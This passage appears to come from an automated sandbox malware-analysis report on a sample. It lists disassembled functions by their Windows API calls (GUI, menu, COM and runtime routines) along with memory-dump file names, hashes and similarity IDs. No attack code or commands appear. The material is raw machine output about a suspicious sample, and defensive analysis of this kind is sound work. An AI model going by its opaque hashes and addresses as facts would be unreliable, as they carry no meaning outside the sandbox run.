                                                                        • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 008F4FCA
                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008F4FEC
                                                                        • SetActiveWindow.USER32 ref: 008F500B
                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008F5019
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 008F5038
                                                                        • Sleep.KERNEL32(000000FA), ref: 008F5043
                                                                        • IsWindow.USER32 ref: 008F504F
                                                                        • EndDialog.USER32(00000000), ref: 008F5060
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                        • String ID: BUTTON
                                                                        • API String ID: 1194449130-3405671355
                                                                        • Opcode ID: 438a3cc7ac416747ccd4eee8ea4f6061f4f4f9667522328b55a5685e69560155
                                                                        • Instruction ID: b8d7bfb3196ce923ef181aa223279eacfecbc0ddd196b6965dd25086d47e6c98
                                                                        • Opcode Fuzzy Hash: 438a3cc7ac416747ccd4eee8ea4f6061f4f4f9667522328b55a5685e69560155
                                                                        • Instruction Fuzzy Hash: 10218E7026CB0DAFE7119F71EC98A763A69FB4478AF045124F205C21B1EF718D51EB62
                                                                        Function 008FD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • CoInitialize.OLE32(00000000), ref: 008FD5EA
                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008FD67D
                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 008FD691
                                                                        • CoCreateInstance.OLE32(00922D7C,00000000,00000001,00948C1C,?), ref: 008FD6DD
                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008FD74C
                                                                        • CoTaskMemFree.OLE32(?,?), ref: 008FD7A4
                                                                        • _memset.LIBCMT ref: 008FD7E1
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 008FD81D
                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008FD840
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 008FD847
                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008FD87E
                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 008FD880
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow_memset
                                                                        • String ID:
                                                                        • API String ID: 521252376-0
                                                                        • Opcode ID: 5c36e91ff983ac9a5cbc861344296ae5c50afaa9d1cfaea825b38e758a41540b
                                                                        • Instruction ID: 51ebe5538c1e0a62b1fc64340217fbe69902a83c75c9ebb508489c964dae3fcb
                                                                        • Opcode Fuzzy Hash: 5c36e91ff983ac9a5cbc861344296ae5c50afaa9d1cfaea825b38e758a41540b
                                                                        • Instruction Fuzzy Hash: 40B1FE75A00219AFDB04DFA8C884DAEBBF9FF49314B148469F90ADB261DB30ED41CB51
                                                                        Function 008EC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000001), ref: 008EC283
                                                                        • GetWindowRect.USER32(00000000,?), ref: 008EC295
                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 008EC2F3
                                                                        • GetDlgItem.USER32(?,00000002), ref: 008EC2FE
                                                                        • GetWindowRect.USER32(00000000,?), ref: 008EC310
                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 008EC364
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 008EC372
                                                                        • GetWindowRect.USER32(00000000,?), ref: 008EC383
                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 008EC3C6
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 008EC3D4
                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008EC3F1
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 008EC3FE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                        • String ID:
                                                                        • API String ID: 3096461208-0
                                                                        • Opcode ID: 86122f3ff8a35eb7e87b8a88287346938a7d3bba06a821fa5bdd838b516e2b69
                                                                        • Instruction ID: f7e272131eed7fc4a5987b6db0010b4323c2fab029a05e0bca68046970b15e84
                                                                        • Opcode Fuzzy Hash: 86122f3ff8a35eb7e87b8a88287346938a7d3bba06a821fa5bdd838b516e2b69
                                                                        • Instruction Fuzzy Hash: AA514E71B10209AFDB18CFA9DD99AAEBBBAFB89310F14812DF516D7290D7709D01CB10
                                                                        Function 0089201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00891B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00892036,?,00000000,?,?,?,?,008916CB,00000000,?), ref: 00891B9A
                                                                        • DestroyWindow.USER32(?), ref: 008920D3
                                                                        • KillTimer.USER32(-00000001,?,?,?,?,008916CB,00000000,?), ref: 0089216E
                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 008CBCA6
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,008916CB,00000000,?), ref: 008CBCD7
                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,008916CB,00000000,?), ref: 008CBCEE
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008916CB,00000000), ref: 008CBD0A
                                                                        • DeleteObject.GDI32(00000000), ref: 008CBD1C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 641708696-0
                                                                        • Opcode ID: f52bcf6231fdefb87450c52d8564f61a76def51bd8253865a46c3c5941fc4a70
                                                                        • Instruction ID: f177912d51a24ff68c3b2f04982492b381ed01902943bdb0eb6c7569e448ccbc
                                                                        • Opcode Fuzzy Hash: f52bcf6231fdefb87450c52d8564f61a76def51bd8253865a46c3c5941fc4a70
                                                                        • Instruction Fuzzy Hash: F3619C30628F14EFCB35AF15D969B2977F1FB44316F58842CE642CAA71C770A890EB81
                                                                        Function 008921A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008925DB: GetWindowLongW.USER32(?,000000EB), ref: 008925EC
                                                                        • GetSysColor.USER32(0000000F), ref: 008921D3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ColorLongWindow
                                                                        • String ID:
                                                                        • API String ID: 259745315-0
                                                                        • Opcode ID: 9f333bea182f1b7feedfd332c740b79bdd2ccf6a256b0c19353fecf31e103258
                                                                        • Instruction ID: a81aedadef9fbb23e49b0b7b397093c506d0671e0ac466e5f5a85a15b04cd3f2
                                                                        • Opcode Fuzzy Hash: 9f333bea182f1b7feedfd332c740b79bdd2ccf6a256b0c19353fecf31e103258
                                                                        • Instruction Fuzzy Hash: 20419331108544FADF25AF68EC98BB97B66FB06731F184265FE65CA1E1C7318C41DB21
                                                                        Function 008FA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?,0091F910), ref: 008FA90B
                                                                        • GetDriveTypeW.KERNEL32(00000061,009489A0,00000061), ref: 008FA9D5
                                                                        • _wcscpy.LIBCMT ref: 008FA9FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                        • API String ID: 2820617543-1000479233
                                                                        • Opcode ID: d13eaeafe97634611cba2f2c107e34e1b99e28ef605a632f93fa1a0302322a06
                                                                        • Instruction ID: dd7b2b87c7782b1614eded0460dcb7860ff7238b7362cf7fdf1d62aa2cf8be50
                                                                        • Opcode Fuzzy Hash: d13eaeafe97634611cba2f2c107e34e1b99e28ef605a632f93fa1a0302322a06
                                                                        • Instruction Fuzzy Hash: BC51BF71218305ABC714EF28C892ABFBBE5FF84354F14482DF5A9D7292DB709909CA53
                                                                        Function 00917152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0091716A
                                                                        • CreateMenu.USER32 ref: 00917185
                                                                        • SetMenu.USER32(?,00000000), ref: 00917194
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00917221
                                                                        • IsMenu.USER32(?), ref: 00917237
                                                                        • CreatePopupMenu.USER32 ref: 00917241
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0091726E
                                                                        • DrawMenuBar.USER32 ref: 00917276
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                        • String ID: 0$F
                                                                        • API String ID: 176399719-3044882817
                                                                        • Opcode ID: 0222112067cd694cc20df9a4e2fd9eec6fea66810ee13ace44ef1957cd727b8b
                                                                        • Instruction ID: 39d52cbc5d4e78cc6473f4dd778e157223a46eb0c6dc43a880fb52c25c20c08f
                                                                        • Opcode Fuzzy Hash: 0222112067cd694cc20df9a4e2fd9eec6fea66810ee13ace44ef1957cd727b8b
                                                                        • Instruction Fuzzy Hash: 81413674A1520AEFDB20DFA4D894EEABBFAFF48310F144428F915A7361D731A910DB90
                                                                        Function 009174BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0091755E
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00917565
                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00917578
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00917580
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0091758B
                                                                        • DeleteDC.GDI32(00000000), ref: 00917594
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0091759E
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001,?,?,?,?,008CCA95,?,?,?,?,?,?,?), ref: 009175B2
                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009175BE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                        • String ID: static
                                                                        • API String ID: 2559357485-2160076837
                                                                        • Opcode ID: 597ea9126431cc16972784cd44cfe02d1ad643d05eb47657f5dc385ddf3f2d6f
                                                                        • Instruction ID: a0721c2943d14d253e87fd83cd466478967e0f64c4ada781947581fcdc308125
                                                                        • Opcode Fuzzy Hash: 597ea9126431cc16972784cd44cfe02d1ad643d05eb47657f5dc385ddf3f2d6f
                                                                        • Instruction Fuzzy Hash: 92316C3221821DBBDF119FA4DC08FDA7B6EFF09360F114224FA15961A0C731D851EBA4
                                                                        Function 008B6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008B6E3E
                                                                          • Part of subcall function 008B8B28: __getptd_noexit.LIBCMT ref: 008B8B28
                                                                        • __gmtime64_s.LIBCMT ref: 008B6ED7
                                                                        • __gmtime64_s.LIBCMT ref: 008B6F0D
                                                                        • __gmtime64_s.LIBCMT ref: 008B6F2A
                                                                        • __allrem.LIBCMT ref: 008B6F80
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B6F9C
                                                                        • __allrem.LIBCMT ref: 008B6FB3
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B6FD1
                                                                        • __allrem.LIBCMT ref: 008B6FE8
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B7006
                                                                        • __invoke_watson.LIBCMT ref: 008B7077
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                        • String ID:
                                                                        • API String ID: 384356119-0
                                                                        • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                        • Instruction ID: cb9c78e188d2453352711b1ec4d3aae295e34ed609c3b7464647634982f1b3bd
                                                                        • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                        • Instruction Fuzzy Hash: 02711472A00B16ABD714AE6CDC41BAAB7B8FF44324F14822AF514D7381F774EA518B91
                                                                        Function 008F2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F2542
                                                                        • GetMenuItemInfoW.USER32(00955890,000000FF,00000000,00000030), ref: 008F25A3
                                                                        • SetMenuItemInfoW.USER32(00955890,00000004,00000000,00000030), ref: 008F25D9
                                                                        • Sleep.KERNEL32(000001F4), ref: 008F25EB
                                                                        • GetMenuItemCount.USER32(?), ref: 008F262F
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 008F264B
                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 008F2675
                                                                        • GetMenuItemID.USER32(?,?), ref: 008F26BA
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008F2700
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008F2714
                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008F2735
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                        • String ID:
                                                                        • API String ID: 4176008265-0
                                                                        • Opcode ID: 6d5adc3e76966ec551c9ca678145848853da6e48f1c5ce836f87c561a3038380
                                                                        • Instruction ID: cd6efbc15bc915e849f812c0e55b054f3a71832b108446c8ce07313e511fb75d
                                                                        • Opcode Fuzzy Hash: 6d5adc3e76966ec551c9ca678145848853da6e48f1c5ce836f87c561a3038380
                                                                        • Instruction Fuzzy Hash: 0761BA70A1424DAFDB11DFB8C8989BEBBB9FB05308F144059EA52E3251D735AD05DB21
                                                                        Function 00916F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00916FA5
                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00916FA8
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00916FCC
                                                                        • _memset.LIBCMT ref: 00916FDD
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00916FEF
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00917067
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 830647256-0
                                                                        • Opcode ID: 89cdfa52de5f22722fb72a96a2b2cd6fba00b1e9ce6f5069662a005d95968123
                                                                        • Instruction ID: 8f1a0c0351d5c4f8c2c16b1ef07e7858b5ea9c6c492d1656e223d6c7ce1d234b
                                                                        • Opcode Fuzzy Hash: 89cdfa52de5f22722fb72a96a2b2cd6fba00b1e9ce6f5069662a005d95968123
                                                                        • Instruction Fuzzy Hash: BA616A75A04209AFDB11DFA4CC81EEEB7F8EB09710F104159FA15EB2A2C771AD85DB90
                                                                        Function 008E6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008E6BBF
                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 008E6C18
                                                                        • VariantInit.OLEAUT32(?), ref: 008E6C2A
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 008E6C4A
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 008E6C9D
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 008E6CB1
                                                                        • VariantClear.OLEAUT32(?), ref: 008E6CC6
                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 008E6CD3
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008E6CDC
                                                                        • VariantClear.OLEAUT32(?), ref: 008E6CEE
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008E6CF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                        • String ID:
                                                                        • API String ID: 2706829360-0
                                                                        • Opcode ID: e191743b932372f6f5d3c69120dc77d5b12ed49fc3c75db5d6be56b0e6b02f4f
                                                                        • Instruction ID: ebd916f8adbcd6808fdf936e911fa34a93a5bf5a4716c34a313dc008711826ca
                                                                        • Opcode Fuzzy Hash: e191743b932372f6f5d3c69120dc77d5b12ed49fc3c75db5d6be56b0e6b02f4f
                                                                        • Instruction Fuzzy Hash: 47418F31A0421D9FCF00DFA9D8589EEBBB9FF59354F00C069E955E7261DB30A945CB90
                                                                        Function 0091D43E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0091D47C
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0091D49C
                                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0091D6D7
                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0091D6F5
                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0091D716
                                                                        • ShowWindow.USER32(00000003,00000000), ref: 0091D735
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0091D75A
                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0091D77D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                        • String ID:
                                                                        • API String ID: 1211466189-3916222277
